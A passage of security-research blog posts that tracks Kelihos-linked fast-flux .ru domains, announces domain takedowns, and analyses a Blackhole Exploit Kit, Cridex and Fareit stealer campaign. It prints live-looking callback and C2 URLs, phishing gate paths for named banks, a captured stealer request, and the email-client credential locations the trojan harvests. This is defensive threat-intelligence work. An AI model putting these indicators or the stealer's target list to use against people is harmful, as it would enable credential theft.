worgukiw.ru  A  90.46.70.228
worgukiw.ru  A  93.105.108.84
worgukiw.ru  A  109.126.30.178
worgukiw.ru  A  111.255.78.122
worgukiw.ru  A  112.105.92.46
worgukiw.ru  A  114.39.91.89
worgukiw.ru  A  119.70.17.64
worgukiw.ru  A  159.148.43.126
worgukiw.ru  A  178.44.196.20
worgukiw.ru  A  178.218.65.83
worgukiw.ru  A  201.213.124.107

oqivynle.ru  A  1.169.174.98
oqivynle.ru  A  27.3.193.56
oqivynle.ru  A  37.19.146.142
oqivynle.ru  A  58.99.12.25
oqivynle.ru  A  66.176.136.81
oqivynle.ru  A  77.45.11.232
oqivynle.ru  A  88.222.224.163
oqivynle.ru  A  93.105.37.117
oqivynle.ru  A  96.49.157.112
oqivynle.ru  A  111.249.158.111
oqivynle.ru  A  151.32.120.175
oqivynle.ru  A  182.156.158.115
oqivynle.ru  A  187.186.74.50
oqivynle.ru  A  188.129.225.16
(you can get more infector domains by tracing ↑these IP) The DNS Server used for the Khelios Payload .RU domains:
ns1.newrect.com
ns2.newrect.com
ns3.newrect.com
ns4.newrect.com
ns5.newrect.com
ns6.newrect.com
↑This registrar shall be put into subject of investigation. So let's analyze how these infector domains distributed by its evil DNS to their IP addresses. I am using two random DNS servers as- a start base of tracking its current NS record,
@unixfreaxjp /malware]$ date
Mon Dec 31 04:10:26 JST 2012

@unixfreaxjp /malware]$ mydnstrace cucaklif.ru worgukiw.ru oqivynle.ru

Tracing to cucaklif.ru[a] via 202.238.95.24, maximum of 3 retries
202.238.95.24 (202.238.95.24)
 |\___ d.dns.ripn.net [ru] (194.190.124.17)
 |     |\___ ns6.newrect.com [cucaklif.ru] (46.118.84.205) Got authoritative answer
 |     |\___ ns5.newrect.com [cucaklif.ru] (98.203.119.95) Got authoritative answer
 |     |\___ ns1.newrect.com [cucaklif.ru] (62.178.200.113) * * *
 |     |\___ ns4.newrect.com [cucaklif.ru] (84.232.243.160) Got authoritative answer
 |     |\___ ns3.newrect.com [cucaklif.ru] (14.98.225.76) Got authoritative answer
 |      \___ ns2.newrect.com [cucaklif.ru] (1.169.82.215) Got authoritative answer
 |\___ b.dns.ripn.net [ru] (194.85.252.62)
 |     |\___ ns3.newrect.com [cucaklif.ru] (159.224.247.96) * Got authoritative answer
 |     |\___ ns4.newrect.com [cucaklif.ru] (95.68.85.182) Got authoritative answer
 |     |\___ ns6.newrect.com [cucaklif.ru] (176.36.82.206) Got authoritative answer
 |     |\___ ns5.newrect.com [cucaklif.ru] (136.169.52.175) Got authoritative answer
 |     |\___ ns2.newrect.com [cucaklif.ru] (115.252.8.87) Got authoritative answer
 |      \___ ns1.newrect.com [cucaklif.ru] (87.110.84.205) Got authoritative answer
 |\___ e.dns.ripn.net [ru] (193.232.142.17)
 |     |\___ ns1.newrect.com [cucaklif.ru] (86.125.192.34) * * Got authoritative answer
 |     |\___ ns5.newrect.com [cucaklif.ru] (79.115.4.61) Got authoritative answer
 |     |\___ ns3.newrect.com [cucaklif.ru] (60.196.154.12) Got authoritative answer
 |     |\___ ns4.newrect.com [cucaklif.ru] (124.43.156.174) Got authoritative answer
 |     |\___ ns6.newrect.com [cucaklif.ru] (66.63.125.247) Got authoritative answer
 |      \___ ns2.newrect.com [cucaklif.ru] (37.123.3.213) Got authoritative answer
 |\___ f.dns.ripn.net [ru] (193.232.156.17)
 |     |\___ ns2.newrect.com [cucaklif.ru] (46.98.30.104) Got authoritative answer
 |     |\___ ns6.newrect.com [cucaklif.ru] (218.37.77.170) Got authoritative answer
 |     |\___ ns1.newrect.com [cucaklif.ru] (114.26.132.112) * * *
 |     |\___ ns4.newrect.com [cucaklif.ru] (223.179.247.64) Got authoritative answer
 |     |\___ ns5.newrect.com [cucaklif.ru] (37.235.181.207) Got authoritative answer
 |      \___ ns3.newrect.com [cucaklif.ru] (111.119.184.27) * * *
  \___ a.dns.ripn.net [ru] (193.232.128.6)
       |\___ ns5.newrect.com [cucaklif.ru] (91.196.45.235) Got authoritative answer
       |\___ ns3.newrect.com [cucaklif.ru] (195.254.182.197) Got authoritative answer
       |\___ ns1.newrect.com [cucaklif.ru] (93.78.154.181) Got authoritative answer
       |\___ ns4.newrect.com [cucaklif.ru] (50.150.25.163) Got authoritative answer
       |\___ ns2.newrect.com [cucaklif.ru] (213.200.53.16) * * *
        \___ ns6.newrect.com [cucaklif.ru] (89.41.42.216) Got authoritative answer

Tracing to worgukiw.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
 |\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
 |\___ d.dns.ripn.net [ru] (194.190.124.17)
 |     |\___ ns3.newrect.com [worgukiw.ru] (188.190.5.185) Got authoritative answer
 |     |\___ ns4.newrect.com [worgukiw.ru] (71.192.243.34) Got authoritative answer
 |     |\___ ns6.newrect.com [worgukiw.ru] (86.100.10.121) Got authoritative answer
 |     |\___ ns1.newrect.com [worgukiw.ru] (78.97.37.167) Got authoritative answer
 |     |\___ ns2.newrect.com [worgukiw.ru] (93.116.113.161) Got authoritative answer
 |      \___ ns5.newrect.com [worgukiw.ru] (111.88.6.136) *
 |\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
 |\___ b.dns.ripn.net [ru] (194.85.252.62)
 |     |\___ ns4.newrect.com [worgukiw.ru] (46.250.124.196) Got authoritative answer
 |     |\___ ns2.newrect.com [worgukiw.ru] (87.110.88.204) Got authoritative answer
 |     |\___ ns1.newrect.com [worgukiw.ru] (95.46.206.59) Got authoritative answer
 |     |\___ ns6.newrect.com [worgukiw.ru] (50.130.45.53) *
 |     |\___ ns5.newrect.com [worgukiw.ru] (94.244.177.63) Got authoritative answer
 |      \___ ns3.newrect.com [worgukiw.ru] (117.226.27.200) Got authoritative answer
 |\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
 |\___ a.dns.ripn.net [ru] (193.232.128.6)
 |     |\___ ns1.newrect.com [worgukiw.ru] (111.67.75.93) *
 |     |\___ ns5.newrect.com [worgukiw.ru] (37.99.24.241) *
 |     |\___ ns3.newrect.com [worgukiw.ru] (49.205.243.189) *
 |     |\___ ns4.newrect.com [worgukiw.ru] (95.209.170.44) Got authoritative answer
 |     |\___ ns2.newrect.com [worgukiw.ru] (175.180.77.31) *
 |      \___ ns6.newrect.com [worgukiw.ru] (188.124.119.193) Got authoritative answer
 |\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
 |\___ f.dns.ripn.net [ru] (193.232.156.17)
 |     |\___ ns5.newrect.com [worgukiw.ru] (109.94.108.114) Got authoritative answer
 |     |\___ ns1.newrect.com [worgukiw.ru] (176.240.146.178) Got authoritative answer
 |     |\___ ns4.newrect.com [worgukiw.ru] (71.192.243.34) (cached)
 |     |\___ ns3.newrect.com [worgukiw.ru] (180.149.218.65) *
 |     |\___ ns2.newrect.com [worgukiw.ru] (91.196.45.235) Got authoritative answer
 |      \___ ns6.newrect.com [worgukiw.ru] (109.169.207.220) Got authoritative answer
 |\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
  \___ e.dns.ripn.net [ru] (193.232.142.17)
       |\___ ns2.newrect.com [worgukiw.ru] (95.200.166.236) Got authoritative answer
       |\___ ns6.newrect.com [worgukiw.ru] (195.254.182.197) Got authoritative answer
       |\___ ns4.newrect.com [worgukiw.ru] (82.212.128.63) Got authoritative answer
       |\___ ns3.newrect.com [worgukiw.ru] (218.173.22.77) *
       |\___ ns1.newrect.com [worgukiw.ru] (178.148.145.215) *
        \___ ns5.newrect.com [worgukiw.ru] (111.254.17.110) Got authoritative answer

Tracing to oqivynle.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
 |\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
 |\___ a.dns.ripn.net [ru] (193.232.128.6)
 |     |\___ ns1.newrect.com [oqivynle.ru] (89.148.107.194) Got authoritative answer
 |     |\___ ns6.newrect.com [oqivynle.ru] (89.200.147.156) Got authoritative answer
 |     |\___ ns5.newrect.com [oqivynle.ru] (87.207.101.220) Got authoritative answer
 |     |\___ ns2.newrect.com [oqivynle.ru] (95.57.146.216) Got authoritative answer
 |     |\___ ns4.newrect.com [oqivynle.ru] (118.35.96.145) Got authoritative answer
 |      \___ ns3.newrect.com [oqivynle.ru] (89.228.55.91) Got authoritative answer
 |\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
 |\___ b.dns.ripn.net [ru] (194.85.252.62)
 |     |\___ ns5.newrect.com [oqivynle.ru] (89.43.191.93) Got authoritative answer
 |     |\___ ns4.newrect.com [oqivynle.ru] (82.211.161.239) Got authoritative answer
 |     |\___ ns2.newrect.com [oqivynle.ru] (92.240.37.150) Got authoritative answer
 |     |\___ ns1.newrect.com [oqivynle.ru] (178.150.227.84) Got authoritative answer
 |     |\___ ns3.newrect.com [oqivynle.ru] (118.35.96.145) (cached)
 |      \___ ns6.newrect.com [oqivynle.ru] (84.205.30.45) Got authoritative answer
 |\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
 |\___ e.dns.ripn.net [ru] (193.232.142.17)
 |     |\___ ns4.newrect.com [oqivynle.ru] (178.52.52.126) *
 |     |\___ ns3.newrect.com [oqivynle.ru] (60.196.154.12) Got authoritative answer
 |     |\___ ns6.newrect.com [oqivynle.ru] (31.11.86.91) Got authoritative answer
 |     |\___ ns5.newrect.com [oqivynle.ru] (178.210.153.47) Got authoritative answer
 |     |\___ ns2.newrect.com [oqivynle.ru] (89.191.165.117) Got authoritative answer
 |      \___ ns1.newrect.com [oqivynle.ru] (188.26.249.96) Got authoritative answer
 |\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
 |\___ f.dns.ripn.net [ru] (193.232.156.17)
 |     |\___ ns6.newrect.com [oqivynle.ru] (212.160.231.215) Got authoritative answer
 |     |\___ ns4.newrect.com [oqivynle.ru] (86.106.92.7) Got authoritative answer
 |     |\___ ns5.newrect.com [oqivynle.ru] (5.105.62.233) Got authoritative answer
 |     |\___ ns3.newrect.com [oqivynle.ru] (46.109.99.63) Got authoritative answer
 |     |\___ ns2.newrect.com [oqivynle.ru] (91.190.57.250) Got authoritative answer
 |      \___ ns1.newrect.com [oqivynle.ru] (95.84.197.10) Got authoritative answer
 |\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
  \___ d.dns.ripn.net [ru] (194.190.124.17)
       |\___ ns6.newrect.com [oqivynle.ru] (197.159.13.140) *
       |\___ ns2.newrect.com [oqivynle.ru] (86.100.148.17) Got authoritative answer
       |\___ ns1.newrect.com [oqivynle.ru] (46.172.100.70) Got authoritative answer
       |\___ ns3.newrect.com [oqivynle.ru] (109.239.41.28) Got authoritative answer
       |\___ ns5.newrect.com [oqivynle.ru] (46.109.125.151) *
        \___ ns4.newrect.com [oqivynle.ru] (91.196.45.235) Got authoritative answer

#MalwareMustDie - Happy New Year to friends & crusaders!

Thursday, December 27, 2012

Announce of Multiple Malware Domains Deactivation Progress - The "Operation Tango Down"

To all friends in Malware fighting area and all of the supporter and readers to our MalwareMustDie blog. We have a good news. Our fight against malwares leaps into a next brighter stage. Since all of posted malware cases in MalwareMustDie was not only analyzed, decoded, exposed its infectors layers to its CnC, but through the persistent dedication of our members, we also reported our cases to the authority accordingly and gain a good collaboration with them to receive a cooperation for deactivating of malware domains and its related CnC and infectors .

The established cooperation are well resulted. Herewith, from now on, we are releasing regular series of posts for the malware domains deactivation result upon cases we investigate and follow. The report will contain the list of blocked/suspended Domain Names, IPs, Malicious DNS servers, the bad actor's Registration ID, etc.

We called this operation as "Tango Down", managed by several project leaders. And here is the first official post of this series report.

In this report we'd like to announce two achievements we had during Christmas. The report will be continued in the second part with next detail on the currently on-going process of "Tango Down".

Here's the details:

1. Deactivation of severe .RU malware infector domains

Based on the posted analysis on below posted links (click the numbers to see details) [1] Analysis of Fake Facebook Notification redirect to BHEK & infecting Cridex Malware [2] Spam "You have been sent a file" + WordPress Redirector ... [3] ake Facebook Notification Leads to Cridex/PasswordStealer [4] "More" Spam to BHEK to Cridex; How they define, grab & send the credentials [5] Getting more "Personal" & Deeper into Cridex... [6] The Crime Still Goes On: Trojan Fareit Credential Stealer
We really appreciated the wonderful cooperation received from CERT-GIB - Computer Security Incident Response Team by Group-IB, the effort resulted to a successful deactivated below listed 32 infector domains, which are verdict-ed and proved its relation to the Blackhole Exploit Kit crime users who infect the victims using the Cridex Trojan to drop credentials stealer by using Trojan Fareit.:
genevaonline.ru
pelamutrika.ru  
aliamognoa.ru  
ahiontota.ru    
anifkailood.ru  
podarunoki.ru  
aseniakrol.ru  
publicatorian.ru
pitoniamason.ru
amnaosogo.ru    
aviaonlolsio.ru
dimarikanko.ru  
adanagenro.ru  
awoeionfpop.ru  
aofngppahgor.ru
aviaonlolsio.ru
ganalionomka.ru
publicatorian.ru
francese.ru
cinemaallon.ru
leberiasun.ru
somaliaonfloor.ru
panamechkis.ru  
apendiksator.ru
angelaonfl.ru
adanagenro.ru
antariktika.ru
aliamognoa.ru
apensiona.ru
anifkailood.ru
apolinaklsit.ru
sectantes-x.ru
Following the above achievement, we again thank you for the wonderful collaboration of CERT-GIB, with our front member @it4sec, the other cases posted as per below (click the number for details):
[1] On Daily Basis: DNS switch as anti-forensics feature in Malware
[2] VT Comment: FakeAV's (SUPERAntiSpyware.com) trojan downloader 
After being analyzed & proved as malware with PseudoRandom Domain/DGA callback to motherships which lead to a total 92 of .RU domains, the below list of domains was also successfully suspended, and I just confirmed its deactivation:
 opldkflyvlkywuec.ru
 bdprvpxdejpohqpt.ru
 ddkudnuklgiwtdyw.ru
 eefysywrvkgxuqdf.ru
 qphhsudsmeftdaht.ru
 yayfefhrwawquwcw.ru
 knauycqgsdhgbwjo.ru
 mouwwvcwwlilnxub.ru
 noqzuukouyfuyrmd.ru
 zatiscwwtipqlycd.ru
 rpckbgrziwbdrmhr.ru
 kzxrowftdocgyghs.ru
 ifrhgnqeeotnzrmz.ru
 xmwettbvtbhvrjuo.ru
 ymrhcvphevonympo.ru
 lavvckpordclbduy.ru
 sqwlonyduvpowdgy.ru
 febcbuyswmishvpl.ru
 hfveiooumeyrpchg.ru
 ifrhgnqeeotnzrmz.ru
 uqspvdwyltgcyhft.ru
 wzbdwenwshfzglwt.ru
 lccwpflcdjrdfjib.ru
 lccwpflcdjrdfjib.ru
 nvjgyermzsmynaeq.ru
 owekhoeuhmdiehrw.ru
 bkhyiqitpoxewhmt.ru
 iblpdiqdmmsbnuxb.ru
 ummxjwieppswcnrg.ru
 vmibswhnpqhqwyih.ru
 xndfbivuonkxfxrq.ru
 kbgsbqjugdqrgtdw.ru
 cldcrgtnuwvgnbfd.ru
 tykvyflnjhbnqpnr.ru
 gmokuosvnbkshdtd.ru
 imjosxuhbcdonrco.ru
 jnfrqmekhoevppvw.ru
 vygzhvfiuommkqfj.ru
 elxegvkalqvkyoxc.ru
 pwyloytoagndnrex.ru
 rxupwhkznihnxzqx.ru
 sxpskxdgoczvcjgp.ru
 flthmyjeuhdygshf.ru
 nbqypqrjiqxlfvdj.ru
 yrxysfyekjfooere.ru
 lfbovcaitdrjmkbe.ru
 mfwqdxgdpwiojrjp.ru
 ogrtlmpkqtwmweff.ru
 atsihkcljrqlzvku.ru
 fjgtmicxtlxynlpf.ru
 ifrhgnqeeotnzrmz.ru
 upmqpwyndzwzmmwy.ru
 vqhtwlshzzqsltcp.ru
 iekiyvsbtyozmmwy.ru
 ctolfpcqldrvxvml.ru
 hvuwhwqtoyidfrjg.ru
 gvztjrlasdnlbiei.ru
 uitjsdpvrfgfdhff.ru
 wiombejwxrddpkkx.ru
 jwqbrhwarzjrglbn.ru
 dujovshpvbxgrikw.ru
 pgmxykzlqomziebp.ru
 qhibjmjlnpyovmbn.ru
 shderldqiqdtdcmu.ru
 fufsbovwfzjumtle.ru
 fjgtmicxtlxynlpf.ru
 fqyyxagzkrpvxtki.ru
 rccjvgsgffokiwze.ru
 sdxkjaophbtufumx.ru
 tdsorylshsxjeawf.ru
 gqtcxunxhyujqjkf.ru
 oblcasnhxbbocpfj.ru
 bpnqmxkpxxgbdnby.ru
 cpittmwbqtjrjpql.ru
 dpewaddpoewiycnj.ru
 pchgijctfprxhnje.ru
 hrpgglxvqwjesffr.ru
 zfyafrjmmajqfvbh.ru
 lsbppxhgckolsnap.ru
 bhujzorkulhkpwob.ru
 eilqnjkoytyjuchn.ru
 qtmyeslmsoxkjbku.ru
 jrkjelzwleadyxsd.ru
 venrfhmthwpqlqge.ru
 ksgmckchdppqeicu.ru
 tmrtbcienxrbnsjc.ru
 xeeypppxswpquvrf.ru
 haqmuqqukywrcxfa.ru
 wejungvnykczyjam.ru
 fzsirujgdbvabrjm.ru
 eyxejlabqaytqmjx.ru
 rlvqmipovrqbmvqd.ru
These achievements was made by good collaboration between good guys and good communication with the people with the same strong willing to cleanup our beloved internet communication media from malwares, and ending up in a good result. We thank you very much to CERT-GIB for a tireless and wonderful work, to @it4sec his team and all of MalwareMustDie members involved to make this project runs & success.

The collaboration is continuing for the bigger portion of target for the near future. We will post the next result in the next series.

2. The shutdown of Malware Domains served by Malicious DNS

As per announced previously in the twitter, we exposed the other result of "Tango Down" operation, which aimed multiple infection of multiple scheme of malwares and exploit kit (mostly Blackhole Exploit Kits), which under lead by different member (@essachin).

The deactivated of the malware domains can be done through the collaboration between Domain Registrar related to the DNS service used for the malicious act. Previously we announced 140+ domains are suspended,


..but it looks like the list will be added by another NEW 120 domains shortly.
The current project's leader will post the analysis details in his blog which I will announce its link additionally here.
The latest result of this project is maintained here--->>[PASTEBIN]

(to be continued)

#MalwareMustDie!

Saturday, December 22, 2012

The Crime Still Goes On: Trojan Fareit Credential Stealer - New Server, Same Group, Same Game (via BHEK/Cridex)

As per posted A WEEK AGO here -->>[Prev.Post] that Crime Group STILL infects victims.
The infector concepts and binary works is exactly the same as previous,

Infection Source Summary & Trojan Communication Info

Spam infector:
URL: h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm Server: Apache, WordPress IP: 50.116.98.44
Blackhole:
Landing: h00p://latticesoft.net/detects/continues-little.php Server: nginx/1.3.3 Date: Fri, 21 Dec 2012 18:44:29 GMT Content-Type: text/html X-Powered-By: PHP/5.3.14 IP: 59.57.247.185
Trojan Cridex (payload) download url:
h00p://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=d
Trojan Fareit Download Source:
h00p://94.73.129.120:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://188.120.226.30:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://188.40.109.204:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://204.15.30.202:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://59.90.221.6:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://69.64.89.82:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 
h00p://78.28.120.32:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 
h00p://74.117.107.25:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://174.142.68.239:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://23.29.73.220:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://81.93.250.157:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://188.212.156.170:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://173.203.102.204:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://84.22.100.108:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
*) With all Proxy's Port/Server: 8080 / nginx/1.0.10
Trojan Fareit Stealer Download PoC is as example below:
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 94.73.129.120:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
...?f/.....0N}a.9.Je...U;0..
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 22 Dec 2012 08:29:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Trojan Fareit Callbacks IP:
h00p://132.248.49.112:8080/asp/intro.php
h00p://113.130.65.77:8080/asp/intro.php
h00p://203.113.98.131:8080/asp/intro.php
h00p://110.164.58.250:8080/asp/intro.php
h00p://200.108.18.158:8080/asp/intro.php
h00p://207.182.144.115:8080/asp/intro.php
h00p://148.208.216.70:8080/asp/intro.php
h00p://203.172.252.26:8080/asp/intro.php
h00p://202.6.120.103:8080/asp/intro.php
h00p://203.146.208.180:8080/asp/intro.php
h00p://207.126.57.208:8080/asp/intro.php
h00p://203.80.16.81:8080/asp/intro.php
h00p://202.180.221.186:8080/asp/intro.php
CNC is 62.76.177.51, PoC:
// Credentials sent CnC panel
var adminPanelLocation = 
'h00p://62.76.177.51/if_Career/';

//Data Modify Process:
h00p://62.76.177.123/mx/2B/in/cp.php?h=8

// Phishing Credentials urls
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=wellsfargo
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=bankofamerica
CnC Passwords(reversed from Trojan Fareit):
phpbb      john316      pass        slayer     
qwerty     richard      aaaaaa      wisdom     
jesus      blink182     amanda      praise     
abc123     peaches      nothing     zxcvbnm    
letmein    cool         ginger      samuel     
test       flower       mother      mike       
love       scooter      snoopy      dallas     
password1  banana       jessica     green      
hello      james        welcome     testtest   
monkey     asdfasdf     pokemon     maverick   
dragon     victory      iloveyou1   onelove    
trustno1   london       mustang     david      
iloveyou   123qwe       helpme      mylove     
shadow     startrek     justin      church     
christ     george       jasmine     friend     
sunshine   winner       orange      god        
master     maggie       testing     destiny    
computer   trinity      apple       none       
princess   online       michelle    microsoft  
tigger     123abc       peace       bubbles    
football   chicken      secret      cocacola   
angel      junior       grace       jordan23   
jesus1     chris        william     ilovegod   
whatever   passw0rd     iloveyou2   football1  
freedom    austin       nicole      loving     
killer     sparky       muffin      nathan     
asdf       admin        gateway     emmanuel   
soccer     merlin       fuckyou1    scooby     
superman   google       asshole     fuckoff    
michael    friends      hahaha      sammy      
cheese     hope         poop        maxwell    
internet   shalom       blessing    jason      
joshua     nintendo     blahblah    john       
fuckyou    looking      myspace1    1q2w3e4r   
blessed    harley       matthew     baby       
baseball   smokey       canada      red123     
starwars   joseph       silver      blabla     
purple     lucky        robert      prince     
jordan     digital      forever     qwert      
faith      thunder      asdfgh      chelsea    
summer     spirit       rachel      angel1     
ashley     bandit       rainbow     hardcore   
buster     enter        guitar      dexter     
heaven     anthony      peanut      saved      
pepper     corvette     batman      hallo      
hunter     hockey       cookie      jasper     
lovely     power        bailey      danielle   
andrew     benjamin     soccer1     kitten     
thomas     iloveyou!    mickey      cassie     
angels     1q2w3e       biteme      stella     
charlie    viper        hello1      prayer     
daniel     genesis      eminem      hotdog     
jennifer   knight       dakota      windows    
single     qwerty1      samantha    mustdie    
hannah     creative     compaq      gates      
qazwsx     foobar       diamond     billgates  
happy      adidas       taylor      ghbdtn     
matrix     rotimi       forum       gfhjkm   hgTYDOMium

Analysis Summary & Research Materials

This time I dump every memory of Trojan Fareit in txt here-->>[PASTEBIN] ↑So you can see which FTP, File, POP/SMTP Credentials data's licked & grabbed - as evidence of this evil stealer crime. Additionally see the Fareit Trojan's config here -->>[PASTEBIN] ↑You can confirm targeted online banks info + phishing html codes these actors used. There is slight BHEK changes in PluginDetect Obfuscated Code (Landing Page), I cracked manually with wrote GUIDANCE to decode here -->>[PASTEBIN] PluginDetect before -->>[PASTEBIN] & after decoded-->>[PASTEBIN] Payload binary static & dynamic analysis text(a quicky) -->>[PASTEBIN] Sample download is here -->>[MEDIAFIRE] Captures data is here (PCAP, RegShot, MEMShot, etc)-->>[MEDIAFIRE]

Account Phishing Act by current version Trojan

Hello Citi Account Online! Same as previous: Chase Bank! This time BANK OF AMERICA!!!

PoC of all possible Email Credentials Also Grabbed

In the previous case, I have strong request to check not only http/ftp/server login, but E-Mail credential. Here we go:
POP3_Password2
SMTP_Password2
IMAP_Password2
HTTPMail_Password2
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Mail
Software\Microsoft\Windows Mail
Software\RimArts\B2\Settings
DataDir
DataDirBak
Mailbox.ini
Software\Poco Systems Inc
Path
\PocoSystem.ini
Program
DataPath
accounts.ini
\Pocomail
Software\IncrediMail
EmailAddress
Technology
PopServer
PopPort
PopAccount
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
account.cfg
account.cfn
\BatMail
\The Bat!
Software\RIT\The Bat!
Software\RIT\The Bat!\Users depot
Working Directory
ProgramDir
Count
Default
Dir #%d
SMTP Email Address
SMTP Server
POP3 Server
POP3 User Name
SMTP User Name
NNTP Email Address
NNTP User Name
NNTP Server
IMAP Server
IMAP User Name
Email
HTTP User
HTTP Server URL
POP3 User
IMAP User
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTP Password
SMTP Password
Software\Microsoft\Internet Account Manager\Accounts
Identities
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Internet Account Manager
Outlook
\Accounts
identification
identitymgr
inetcomm server passwords
outlook account manager passwords identities

Virus Total Detection Ratio

Landing Page: (3/45) ---->>[VirusTotal] Trojan Cridex Downloader: (15/44) ---->>[VirusTotal] Trojan Fareit Credential Stealer: (4/45) ---->>[VirusTotal]

PoC / Analysis ScreenShots

Malware processes: Payload after self copied(dropped) into %AppData%\ Network HTTP Traffic captured: Need to fix the binary before reversing properly...
//Very annoying anti-reverse....
   :         :                           :
0x00003cf2 (01) 47                     INC EDI
0x00003cf3 (01) 5c                     POP ESP
0x00003cf4 (05) a9 2835b437            TEST EAX, 0x37b43528
0x00003cf9 (03) 0ff2f8                 PSLLD MM7, MM0
0x00003cfc (01) 4b                     DEC EBX
0x00003cfd (01) 95                     XCHG EBP, EAX
0x00003cfe (02) b2 f9                  MOV DL, 0xf9
0x00003d00 (01) ef                     OUT DX, EAX
0x00003d01 (01) 51                     PUSH ECX
0x00003d02 (01) ac                     LODSB
0x00003d03 (01) 46                     INC ESI
0x00003d04 (02) 71 77                  JNO 0x00003d7d   ; 1
0x00003d04 --------------------------------------------------
0x00003d06 (02) 72 71                  JB 0x00003d79    ; 2
0x00003d06 --------------------------------------------------
0x00003d08 (02) 77 72                  JA 0x00003d7c    ; 3
0x00003d08 --------------------------------------------------
0x00003d0a (02) 71 77                  JNO 0x00003d83   ; 4
0x00003d0a --------------------------------------------------
0x00003d0c (02) 72 71                  JB 0x00003d7f    ; 5
  :          :    :                     :    :     :
3CE8   50 44 44 33 D7 24 91 FF 62 27 47 5C A9 28 35 B4    PDD3.$..b'G..(5.
3CF8   37 0F F2 F8 4B 95 B2 F9 EF 51 AC 46 71 77 72 71    7...K....Q.Fqwrq
3D08   77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77    wrqwrqwrqwrqwrqw // This qwrqwr :-(((
3D18   72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72    rqwrqwrqwrqwrqwr
3D28   71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71    qwrqwrqwrqwrqwrq
3D38   77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77    wrqwrqwrqwrqwrqw
3D48   72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72    rqwrqwrqwrqwrqwr
3D58   71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71    qwrqwrqwrqwrqwrq
  :                             :                            :

PoC of the same group as previous case

Seriously, it uses the same NS server registered by same person..
// latticesoft.net < dns search  

;; QUESTION SECTION:
;latticesoft.net.               IN      ANY

;; ANSWER SECTION:
latticesoft.net.        900     IN      A       59.57.247.185
latticesoft.net.        900     IN      SOA     ns1.amishshoppe.net. . 1356192301 60 120 1048576 900
latticesoft.net.        900     IN      NS      ns2.amishshoppe.net.
latticesoft.net.        900     IN      NS      ns1.amishshoppe.net.

;; AUTHORITY SECTION:
latticesoft.net.        900     IN      NS      ns2.amishshoppe.net.
latticesoft.net.        900     IN      NS      ns1.amishshoppe.net.

;; ADDITIONAL SECTION:
ns1.amishshoppe.net.    3600    IN      A       209.140.18.37
